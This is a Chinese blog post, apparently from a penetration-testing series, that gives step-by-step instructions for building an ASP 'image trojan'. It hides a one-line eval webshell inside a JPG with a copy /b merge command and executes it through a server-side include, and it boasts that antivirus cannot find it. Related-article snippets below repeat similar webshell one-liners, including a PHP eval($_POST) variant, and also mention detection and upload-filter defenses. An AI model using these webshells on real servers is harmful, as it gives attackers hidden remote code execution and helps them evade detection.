渗透之——asp图片木马的制作和使用

最新推荐文章于 2024-07-28 22:23:00 发布
最新推荐文章于 2024-07-28 22:23:00 发布
阅读量1.4w 收藏 28
点赞数 2
分类专栏: 精通渗透系列 文章标签: 渗透 asp木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1028386804/article/details/84959588
版权

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84959588

主要亮点:图片木马(可以正常打开显示的木马)

先看代码:
仅需几步:图片和一句话木马合并,制作可以正常显示的图片木马。
1、找一张图片,名字改成1.jpg
2、<%eval request(“a”)%>存为1.asp(就是一句话木马)
3、copy 1.jpg /b + 1.asp /a asp.jpg 存为1.bat文件

注:以上三个文件放在同一目录里面

复制当前目录下的1.jpg图片和当前目录下的1.asp文件并以ASCII代码的方式合并为 asp.jpg图片,运行1.bat,就会出现一个图片asp.jpg,现在这个asp.jpg就是已经做好的木马了。

这个图片外表很正常,用缩略图也看不出任何破绽,但是却非常的危险,让人防不胜防。

利用方法:新建一个asp.asp 内容为:

<!–#include file=”asp.jpg”–>

把asp.jpg 和 asp.asp 放在同一目录,然后访问: asp.asp   用这种方法,任何杀毒是搜不到的

冰 河
关注
专栏目录
渗透测试之突破口——web服务突破
m0_61506558的博客
10-17 546
任意用户注册可爆破用户名爆破用户名,密码用户名注入万能密码用户名Xss修改返回包信息,登入他人账户修改cookie中的参数,如user,adminid等HTML源码、JS等查看信息搜集一章后台登录参数修改为注册参数/reg、/register、/sign等密码重置1.重置一个账户,不发送验证码,设置验证码为空发送请求。2.发送验证码,查看相应包3.验证码生存期的爆破4.修改相应包为成功的相应包5.手工直接跳转到校验成功的界面。
图片木马制作的三种方法
热门推荐
whatday的专栏
01-25 6万+
1.Copy命令制作 1.asp内容: 打开cmd,数据一下命令: 此时打开两个jpg文件,相比: 且打开2.jpg可以像1.jpg一样显示图像。 把以下代码放入目标网站,即可按asp执行。 2.Uedit32 本制作来自于:雪糕。 我们通常在得到webshell之后都想给自己留
检测ASP图片木马的函数
01-14
本文介绍一个检测ASP图片木马的函数,由于FSO无法读取客户端文件的内容,所以只能在文件上传到服务器后再打开文件进行内容检查。
做一个图片图片木马)的四种方法 小白也能看会(详细步骤 ) 需要.htaccess等执行图片内代码
最新发布
qq_48368964的博客
07-28 1857
图片:就是在图片中隐藏一句话木马。利用.htaccess等。
图片asp木马制作方法[转]
weixin_33929309的博客
03-20 253
一个网站里面除了asp文件,再就数图片文件最多了,它让我们的网页"美丽动人"嘻嘻,但是你有没有想到过这里面暗藏的杀机,图片也可以是asp木马。 一个网站里面除了asp文件,再就数图片文件最多了,它让我们的网页"美丽动人"嘻嘻,但是你有没有想到过这里面暗藏的杀机,图片也可以是asp木马asp木马已经出现很长时间了,种类也越来越多,但是说到隐蔽性,我们红魂老大写的--冰狐浪子a...
关于 asp 木马
sollion的专栏
01-13 1450
一、木马生成asp木马代码加密,图片合并,文件时间修改,还有要命的系统漏洞利用 图片木马合并命令:copy 1.gif /b + asp.asp /a asp.gif  二、木马上传如果后台没有类似数据库备份功能,可以生成新文件,或者直接修改文件。那么很难直接让木马运行,不过还是有一些方法,可以考虑。     1、如果后台数据库是以asp格式存储的。那么可以采用在数据库中
美人计--图片asp木马
weixin_33733810的博客
03-28 133
一个网站里面除了asp文件,再就数图片文件最多了,它让我们的网页"美丽动人",但是你有没有想到过这里面暗藏的杀机,图片也可以是asp木马asp木马已经出现很长时间了,种类也越来越多,隐蔽性也非常强,现在我们就找一个asp木马把它作成图片asp木马。 首先我们把asp木马服务端直接该后缀名为gif,记得用容错格式: 一、include给我们指路 接下来要使用include...
图片木马-渗透测试
h0ers的博客
10-28 2795
制作图片木马中的问题 问题 :copy命令制作图片木马后,菜刀无法连接 1.执行步骤: 一张普通图片:1.jpg php版本一句话木马,保存为 1.php,代码如下: <?php @eval($_POST['pass']);?> 制作图片木马,将图片文件和php文件合并为2.jpg,命令如下: copy 1.jpg/b+1.php/a 2.jpg 其中 /b代表二进制文件,/a代表ASCII码文件 上传成功后,用菜刀连接,弹出成功获取图片,未拿到webshell。 2.问题排查 用HxD h
渗透测试入门—— 常见术语概述
weixin_46694260的博客
12-26 9055
00x1 前言 刚入门小白,收集了一些渗透术语,废话不多说。 00x2 渗透术语 1.脚本 动态网站(如:asp,php,jsp), linux, python 2.网站 2.1静态网站:与后台交互比较少,如html) 2.2动态网站:使用动态脚本编写 如:asp,php,jsp,交互方便但是安全性不高,如果代码过滤不严格可能会导致漏洞最终导致后台linux被别人随意操作 3.http协议 http(HyperText Transfer Protocol),超文本传输协议。是因特网上应用最为广泛的一种网络传
谁来教我渗透测试——基础概念
菜鸟小白的学习分享
07-25 293
说来也惭愧,菜鸟小白已经干了三年安全产品的测试,但是对于渗透测试都不曾好好了解,一直停留在基础功能测试和自动化测试的摸索上。正好我们组内在组织渗透测试的全套课程学习,将会从最基础的内容开始学起,学习的内容菜鸟小白也会整理出来,一起分享。 今天我们一起来看看一些基础概念吧。 基础概念 1、脚本(asp、php、jsp) ASPASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境,可用来创建动态交互式网页并建立强大的web应用程序。当服务器收到对ASP文件的请求时,它
渗透测试专业术语——攻击篇
m0_62614507的博客
03-06 1018
渗透测试专业术语——攻击篇
ASP下检测图片木马的函数代码
01-02
木马原理:入侵者使用诸如ASP图片木马生成器之类的工具将一张正常的图片与一个ASP木马文件合并成一个图片文件(即将对网站有害的 ASP代码插在图片编码之后,虽然图片仍然可以正常显示,但是文件内容和尺寸已被改变),然后通过网站提供的文件上传功能上传这一张“合 ‘法的”图片,进而实现了上传ASP木马的目的。 ‘ 防范方法:因为这种木马图片木马的二合一,所以需要在上传图片前检查文件内容,若文件内容不合法(即包含有恶意代码在里面), ‘则禁止上传,从而堵住了木马攻击的源头,这是木马攻击的第一关,至关重要,必须堵住。 ‘****************************************
asp图片木马,需服务器才可运行,真正的让服务器运行图片格式
03-19
asp图片木马,需服务器才可运行,真正的让服务器运行图片格式, 可以让服务器直接运行,(仅供研究用) 需要的同志们,并不在乎分数多少,你做发点东西上来,能帮到别人的话,有就分数了,现在改成三分吧!
asp防止上传图片木马原理解析
01-03
首先判断文件大小: if file.filesize<10 then Response.Write([removed]alert('您没有选择上传文件')[removed]) Response.Write([removed]history.go(-1)[removed]) Response.End() end if 将文件上传到服务器后,判断用户文件中的危险操作字符: set MyFile = server.CreateObject(Scripting.FileSystemObject) set MyText = MyFile.OpenTextFile(FilePa
ASP渗透网站)
05-25
作用不错,可以上传下载文件,可以检测补丁,可以进行server-u提权,可以执行cmd命令,可以隐藏小
淘特ASP木马扫描器 v1.1.rar
07-05
可以扫描服务器上的所有指定类型(asp,cer,asa,cdx)的文件,查出可疑的木马程序。系统采用扫描程序与病毒库分离的形式
第十八章——内网渗透之域渗透
L18296069161的博客
12-24 338
渗透学习交流群:773617250进群可免费领取学习工具,群内定期通知直播时间!欢迎大家进群学习交流!感谢大家的支持! MSF 在讲域渗透之前,先给大家讲讲MSF ●kali代理配置 http://pawelli.com/archives/527 ●回顾msf知识 ●针对内网 批量扫描 ms17-010 ●针对域成员 08R2 msf渗透 并提权 要点:针对对方是x64的架构 生成一个x64的...
asp 检测更改后缀的图片_原创干货 | File Upload关于图片的思考
weixin_39689394的博客
11-25 235
点击关注了解更多精彩内容!!相关背景在一次Java代码审计中,发现某业务系统进行文件上传业务时,使用了如下的方式进行文件上传的后缀检查:其中FileTypeUtil是hutool(Hutool是一个小而全的Java工具类库)下的一个工具类,通过其FileTypeUtil.getType()方法获取到当前上传文件的后缀,然后进行后缀检查,若非图片类型则认为恶意上传操作。相关分析一般来说常见...
图片木马---web渗透学习
Packet_Lee的博客
04-05 1213
在《文件上传漏洞—Web渗透学习》一文中讲到在高安全级别(有较强安全意识的开发人员)中,开放人员定义了用户上传文件的扩展名,只有文件扩展名是jpg、JPG、jpeg、JPEG等文件才允许上传。通过代理服务器等方法无法对其进行渗透。 通过文件包含漏洞的渗透方法和文件上传漏洞的方法结合,可以成功渗透文件上传漏洞中的高安全级别。 原理: 我们在高安全级别中真实的长传一张图片,但在通过图片编辑软件,将ph...
使用asp.net制作课程表录入查询系统
05-23
制作课程表录入查询系统需要以下步骤: 1. 设计数据库:需要设计数据库,包括学生、课程、教师、教室等表,以及课程表表,课程表表需要记录每个班级的每周课程安排。 2. 创建 ASP.NET Web 应用程序:使用 Visual Studio 创建 ASP.NET Web 应用程序。 3. 创建实体类:使用 Entity Framework 创建学生、课程、教师、教室等实体类。 4. 创建控制器:创建控制器用于处理用户的请求,包括添加、修改、删除课程信息,以及查询课程表信息等。 5. 创建视图:创建视图用于展示数据,包括添加、修改、删除课程信息的表单,以及查询课程表信息的页面。 6. 编写代码:编写代码实现用户请求的处理,包括将添加、修改、删除的数据保存到数据库中,以及从数据库中查询课程表信息并展示在页面上。 7. 测试和部署:测试应用程序的功能,并将其部署到服务器上供用户使用。 以上是制作课程表录入查询系统的基本步骤,具体实现过程需要根据具体需求进行调整。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

冰 河

可以吃鸡腿么?

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值